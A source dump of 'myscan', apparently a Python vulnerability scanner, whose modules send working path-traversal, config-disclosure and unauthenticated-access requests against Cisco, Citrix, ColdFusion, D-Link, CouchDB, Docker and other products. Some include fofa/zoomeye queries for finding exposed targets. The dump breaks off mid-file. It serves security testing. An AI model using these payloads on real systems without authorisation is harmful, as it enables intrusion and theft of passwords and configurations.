2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/apereo/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/26 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/axis/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/baota/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/23 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/baota/poc_baota_pmaunauth_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/23 3 | # @Author : caicai 4 | # @File : poc_baota_pmaunauth_2020.py 5 | ''' 6 | fofa 7 | port=888 && body="403 Forbidden" 8 | ''' 9 | 10 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | import re 14 | 15 | 16 | class POC(): 17 | def __init__(self, workdata): 18 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 19 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 20 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 21 | self.name = "baota_pmaunauth" 22 | self.vulmsg = "no detail .just open it . exploit it " 23 | self.level = 2 # 0:Low 1:Medium 2:High 24 | 25 | def verify(self): 26 | # 根据config.py 配置的深度,限定一下目录深度 27 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 28 | return 29 | req = { 30 | "method": "GET", 31 | "url": self.url + "pma/", 32 | "timeout": 10, 33 | "allow_redirects": False, 34 | "verify": False, 35 | } 36 | r = request(**req) 37 | if r is not None and r.status_code == 200 and re.search(b".*?phpmyadmin.*?", r.content,re.I) and b"PHP version" in r.content: 38 | parser_ = response_parser(r) 39 | self.result.append({ 40 | "name": self.name, 41 | "url": req["url"], 42 | "level": self.level, # 0:Low 1:Medium 2:High 43 | "detail": { 44 | "vulmsg": self.vulmsg, 45 | "request": parser_.getrequestraw(), 46 | "response": parser_.getresponseraw() 47 | } 48 | }) 49 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/basework/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/19 3 | # @Author : caicai 4 | # @File : __init__.py.py 5 | 6 | # myscan 一些搜索工作 -------------------------------------------------------------------------------- /myscan/pocs/perfolder/basework/myscan_getpage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : myscan_getpage.py 5 | 6 | ''' 7 | 勿删除此脚本,此脚本不会有任何漏洞输出,目的是通过封装的request,GET请求目录,search模块去搜索响应包,让search模块输出漏洞。 8 | ''' 9 | from myscan.lib.helper.request import request 10 | 11 | class POC(): 12 | def __init__(self, workdata): 13 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 14 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 15 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 16 | self.name = "your poc name" 17 | self.level = 1 # 0:Low 1:Medium 2:High 18 | 19 | def verify(self): 20 | req = { 21 | "method": "GET", 22 | "url": self.url, 23 | "headers": self.dictdata.get("request").get("headers"), 24 | "timeout": 10, 25 | "verify": False, 26 | "allow_redirects": True, 27 | } 28 | r = request(**req) 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/bullwark/poc_bullwark-momentum-lfi_2019.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/18 3 | # @Author : caicai 4 | # @File : poc_bullwark-momentum-lfi_2019.py 5 | 6 | ''' 7 | fofa : 8 | app="Bullwark-Momentum系列IP摄像头" 9 | ''' 10 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | 14 | 15 | class POC(): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "bullwark-momentum-lfi" 21 | self.vulmsg = "link: https://www.exploit-db.com/exploits/47773" 22 | self.level = 2 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | # 根据config.py 配置的深度,限定一下目录深度 26 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 27 | return 28 | req = { 29 | "method": "GET", 30 | "url": self.url + "../../../../../../../../../../../../../etc/passwd", 31 | "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 32 | "timeout": 10, 33 | "verify": False, 34 | } 35 | r = request(**req) 36 | if r is not None and r.status_code == 200 and b"/root:/bin" in r.content: 37 | parser_ = response_parser(r) 38 | self.result.append({ 39 | "name": self.name, 40 | "url": self.url, 41 | "level": self.level, # 0:Low 1:Medium 2:High 42 | "detail": { 43 | "vulmsg": self.vulmsg, 44 | "request": parser_.getrequestraw(), 45 | "response": parser_.getresponseraw() 46 | } 47 | }) 48 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/cacti/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/cisco/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/cisco/pcc_cisco_route_cve-2019-1653_2019.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/3 3 | # @Author : caicai 4 | # @File : pcc_cisco_route_cve-2019-1653_2019.py 5 | 6 | ''' 7 | fofa: 8 | body="out of the Cisco Router" 9 | or 10 | app="CISCO-RV320" to get https://ip:443 11 | ''' 12 | 13 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 14 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 15 | from myscan.config import scan_set 16 | 17 | 18 | class POC(): 19 | def __init__(self, workdata): 20 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 21 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 22 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 23 | self.name = "cisco_route_cve-2019-1653" 24 | self.vulmsg = "google it " 25 | self.level = 2 # 0:Low 1:Medium 2:High 26 | 27 | def verify(self): 28 | 29 | if self.dictdata.get("url").get("protocol") != "https": 30 | return 31 | # 根据config.py 配置的深度,限定一下目录深度 32 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 33 | return 34 | 35 | req = { 36 | "method": "GET", 37 | "url": self.url + "cgi-bin/config.exp", 38 | "timeout": 10, 39 | "allow_redirects": False, 40 | "verify": False, 41 | } 42 | r = request(**req) 43 | if r is not None and r.status_code == 200 and "config.exp" in r.headers.get( 44 | "Content-Disposition","") and b"###sysconfig##" in r.content: 45 | parser_ = response_parser(r) 46 | self.result.append({ 47 | "name": self.name, 48 | "url": self.url, 49 | "level": self.level, # 0:Low 1:Medium 2:High 50 | "detail": { 51 | "vulmsg": self.vulmsg, 52 | "request": parser_.getrequestraw(), 53 | "response": parser_.getresponseraw() 54 | } 55 | }) 56 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/cisco/poc_cisco_asa_cve-2020-3452.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/7/23 3 | # @Author : caicai 4 | # @File : poc_cisco_asa_cve-2020-3452.py 5 | 6 | ''' 7 | zoomeye: 8 | app:"Cisco ASA SSL VPN" 9 | ''' 10 | 11 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 12 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 13 | from myscan.config import scan_set 14 | from myscan.lib.core.common import get_random_str 15 | 16 | 17 | class POC(): 18 | def __init__(self, workdata): 19 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 20 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 21 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 22 | self.name = "cisco_asa_cve-2020-3452" 23 | self.vulmsg = "referer:https://mp.weixin.qq.com/s/i_x7gx_VratC6t8PaCg-Kg" 24 | self.level = 2 # 0:Low 1:Medium 2:High 25 | 26 | def verify(self): 27 | # 根据config.py 配置的深度,限定一下目录深度 28 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 29 | return 30 | req = { 31 | "method": "GET", 32 | "url": self.url + "+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../", 33 | "timeout": 10, 34 | "allow_redirects": False, 35 | "verify": False, 36 | } 37 | r = request(**req) 38 | if r != None and b'otrizna@cisco.com' in r.content and b"get_external_portal" in r.content: 39 | parser_ = response_parser(r) 40 | self.result.append({ 41 | "name": self.name, 42 | "url": req.get("url"), 43 | "level": self.level, # 0:Low 1:Medium 2:High 44 | "detail": { 45 | "vulmsg": self.vulmsg, 46 | "request": parser_.getrequestraw(), 47 | "response": parser_.getresponseraw() 48 | } 49 | }) 50 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/cisco/poc_cisco_xenmobile_cve-2020-8209_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/24 3 | # @Author : caicai 4 | # @File : poc_cisco_xenmobile_cve-2020-8209_2020.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | import re 11 | 12 | 13 | class POC(): 14 | def __init__(self, workdata): 15 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 16 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 17 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 18 | self.name = "xenmobile_cve-2020-8209" 19 | self.vulmsg = "referer:https://mp.weixin.qq.com/s/EiPdSw9d7cN0lMjXVxwvVA" 20 | self.level = 2 # 0:Low 1:Medium 2:High 21 | 22 | def verify(self): 23 | # 根据config.py 配置的深度,限定一下目录深度 24 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 25 | return 26 | req = { 27 | "method": "GET", 28 | "url": self.url + "jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd", 29 | "timeout": 10, 30 | "allow_redirects": False, 31 | "verify": False, 32 | } 33 | r = request(**req) 34 | if r is not None and re.search(b"root:[x*]:0:0:", r.content): 35 | parser_ = response_parser(r) 36 | self.result.append({ 37 | "name": self.name, 38 | "url": req.get("url"), 39 | "level": self.level, # 0:Low 1:Medium 2:High 40 | "detail": { 41 | "vulmsg": self.vulmsg, 42 | "request": parser_.getrequestraw(), 43 | "response": parser_.getresponseraw() 44 | } 45 | }) 46 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/citrix/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/citrix/poc_citrix-cve-2019-19781-path-traversal_2019.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-09 3 | # @Author : caicai 4 | # @File : poc_citrix-cve-2019-19781-path-traversal_2019.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | class POC(): 12 | def __init__(self, workdata): 13 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 14 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 15 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 16 | self.name = "citrix-cve-2019-19781-path-traversal" 17 | self.vulmsg = "referer: https://github.com/mpgn/CVE-2019-19781" 18 | self.level = 2 # 0:Low 1:Medium 2:High 19 | 20 | def verify(self): 21 | # 根据config.py 配置的深度,限定一下目录深度 22 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 23 | return 24 | req = { 25 | "method": "GET", 26 | "url": self.url + "vpn/%2e%2e/vpns/cfg/smb.conf", 27 | "timeout": 10, 28 | "allow_redirects": False, 29 | "verify": False, 30 | } 31 | r = request(**req) 32 | if r != None and r.status_code == 200 and b"encrypt passwords" in r.content and b"name resolve order" in r.content: 33 | parser_ = response_parser(r) 34 | self.result.append({ 35 | "name": self.name, 36 | "url": self.url, 37 | "level": self.level, # 0:Low 1:Medium 2:High 38 | "detail": { 39 | "vulmsg": self.vulmsg, 40 | "request": parser_.getrequestraw(), 41 | "response": parser_.getresponseraw() 42 | } 43 | }) 44 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/citrix/poc_citrix-cve-2020-8982-unauth-fileread_2020.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/2 3 | # @Author : caicai 4 | # @File : poc_citrix-cve-2020-8982-unauth-fileread_2020.py 5 | ''' 6 | 未验证 7 | ''' 8 | 9 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 10 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 11 | from myscan.config import scan_set 12 | 13 | 14 | class POC(): 15 | def __init__(self, workdata): 16 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 17 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.name = "citrix-cve-2020-8982" 20 | self.vulmsg = "google it " 21 | self.level = 2 # 0:Low 1:Medium 2:High 22 | 23 | def verify(self): 24 | # 根据config.py 配置的深度,限定一下目录深度 25 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 26 | return 27 | 28 | req = { 29 | "method": "GET", 30 | "url": self.url + "XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri", 31 | "timeout": 10, 32 | "allow_redirects": False, 33 | "verify": False, 34 | } 35 | r = request(**req) 36 | words = [b"bit app support", b"fonts", b"extensions"] 37 | if r != None and r.status_code == 200 and all([x in r.content for x in words]): 38 | parser_ = response_parser(r) 39 | self.result.append({ 40 | "name": self.name, 41 | "url": self.url, 42 | "level": self.level, # 0:Low 1:Medium 2:High 43 | "detail": { 44 | "vulmsg": self.vulmsg, 45 | "request": parser_.getrequestraw(), 46 | "response": parser_.getresponseraw() 47 | } 48 | }) 49 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/coldfusion/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/coldfusion/poc_coldfusion-cve-2010-2861-lfi_2010.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-04-08 3 | # @Author : caicai 4 | # @File : poc_coldfusion-cve-2010-2861-lfi_2010.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "coldfusion-cve-2010-2861-lfi" 18 | self.vulmsg = "lfi" 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url + "CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en", 28 | "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 29 | "timeout": 10, 30 | "verify": False, 31 | } 32 | r = request(**req) 33 | if r != None and r.status_code == 200 and b"rdspassword=" in r.content and b"encrypted=" in r.content: 34 | parser_ = response_parser(r) 35 | self.result.append({ 36 | "name": self.name, 37 | "url": parser_.geturl(), 38 | "level": self.level, # 0:Low 1:Medium 2:High 39 | "detail": { 40 | "vulmsg": self.vulmsg, 41 | "request": parser_.getrequestraw(), 42 | "response": parser_.getresponseraw() 43 | } 44 | }) -------------------------------------------------------------------------------- /myscan/pocs/perfolder/confluence/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/consul/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/coremail/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/coremail/poc_coremail-cnvd-2019-16798_2019.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-04-08 3 | # @Author : caicai 4 | # @File : poc_coremail-cnvd-2019-16798_2019.py 5 | 6 | 7 | 8 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 9 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 10 | from myscan.config import scan_set 11 | 12 | 13 | class POC(): 14 | def __init__(self, workdata): 15 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 16 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 17 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 18 | self.name = "coremail config msg leak" 19 | self.vulmsg = "配置信息泄露漏洞" 20 | self.level = 2 # 0:Low 1:Medium 2:High 21 | 22 | def verify(self): 23 | # 根据config.py 配置的深度,限定一下目录深度 24 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 25 | return 26 | req = { 27 | "method": "GET", 28 | "url": self.url + "mailsms/s?func=ADMIN:appState&dumpConfig=/", 29 | "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 30 | "timeout": 10, 31 | "verify": False, 32 | "allow_redirects": False 33 | } 34 | r = request(**req) 35 | if r != None and r.status_code == 200 and b"" in r.content: 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": parser_.geturl(), 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/couchcms/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/couchdb/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/couchdb/poc_couchdb-unauth_2016.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-10 3 | # @Author : caicai 4 | # @File : poc_couchdb-unauth_2016.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "couchdb-unauth" 18 | self.vulmsg = '''未授权可rce,referer:https://www.seebug.org/vuldb/ssvid-91597''' 19 | self.level = 3 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url + "_config", 28 | "timeout": 10, 29 | "verify": False, 30 | "allow_redirects": False 31 | } 32 | r = request(**req) 33 | if r != None and r.status_code == 200 and b"replicator_manager" in r.content and b"external_manager" in r.content and b"httpd_design_handlers" in r.content: 34 | parser_ = response_parser(r) 35 | self.result.append({ 36 | "name": self.name, 37 | "url": parser_.geturl(), 38 | "level": self.level, # 0:Low 1:Medium 2:High 39 | "detail": { 40 | "vulmsg": self.vulmsg, 41 | "request": parser_.getrequestraw(), 42 | "response": parser_.getresponseraw() 43 | } 44 | }) 45 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/discuz/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/discuz/poc_discuz-wechat-plugins-unauth_2016.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-04-08 3 | # @Author : caicai 4 | # @File : poc_discuz-wechat-plugins-unauth_2016.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "discuz-wechat-plugins-unauth" 18 | self.vulmsg = "check from https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI" 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | 26 | req = { 27 | "method": "GET", 28 | "url": self.url + "languages.php?id=wechat:wechat&ac=wxregister", 29 | # "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers 30 | "timeout": 10, 31 | "allow_redirects": False, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | if r != None and r.status_code == 302 and "set-cookie" in r.headers and "auth" in r.headers[ 36 | "set-cookie"] and "location" in r.headers and "wsq.discuz.com" in r.headers["location"]: 37 | parser_ = response_parser(r) 38 | self.result.append({ 39 | "name": self.name, 40 | "url": parser_.geturl(), 41 | "level": self.level, # 0:Low 1:Medium 2:High 42 | "detail": { 43 | "vulmsg": self.vulmsg, 44 | "request": parser_.getrequestraw(), 45 | "response": parser_.getresponseraw() 46 | } 47 | }) 48 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/dlink/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/dlink/poc_dlink-cve-2019-17506_2019.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-10 3 | # @Author : caicai 4 | # @File : poc_dlink-cve-2019-17506_2019.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "dlink-cve-2019-17506" 18 | self.vulmsg = "referer: https://xz.aliyun.com/t/6453" 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | 26 | req = { 27 | "method": "POST", 28 | "url": self.url + "getcfg.php", 29 | "headers": { 30 | "Content-Type": "application/x-www-form-urlencoded", 31 | }, 32 | "data": "SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a", 33 | "timeout": 10, 34 | "verify": False, 35 | "allow_redirects": False 36 | } 37 | r = request(**req) 38 | if r != None and r.status_code == 200 and b"" in r.content and b"" in r.content: 39 | parser_ = response_parser(r) 40 | self.result.append({ 41 | "name": self.name, 42 | "url": parser_.geturl(), 43 | "level": self.level, # 0:Low 1:Medium 2:High 44 | "detail": { 45 | "vulmsg": self.vulmsg, 46 | "request": parser_.getrequestraw(), 47 | "response": parser_.getresponseraw() 48 | } 49 | }) 50 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/docker/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/docker/poc_docker-api-unauthorized-rce_2017.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-10 3 | # @Author : caicai 4 | # @File : poc_docker-api-unauthorized-rce_2017.py 5 | 6 | 7 | 8 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 9 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 10 | from myscan.config import scan_set 11 | 12 | 13 | class POC(): 14 | def __init__(self, workdata): 15 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 16 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 17 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 18 | self.name = "docker-api-unauthorized-rce" 19 | self.vulmsg = "referer: https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce" 20 | self.level = 2 # 0:Low 1:Medium 2:High 21 | 22 | def verify(self): 23 | # 根据config.py 配置的深度,限定一下目录深度 24 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 25 | return 26 | 27 | req = { 28 | "method": "GET", 29 | "url": self.url + "info", 30 | "headers": self.dictdata.get("request").get("headers"), 31 | "timeout": 10, 32 | "verify": False, 33 | "allow_redirects": False 34 | } 35 | r = request(**req) 36 | if r != None and r.status_code == 200 and b"KernelVersion" in r.content and b"RegistryConfig" in r.content and b"DockerRootDir" in r.content: 37 | parser_ = response_parser(r) 38 | self.result.append({ 39 | "name": self.name, 40 | 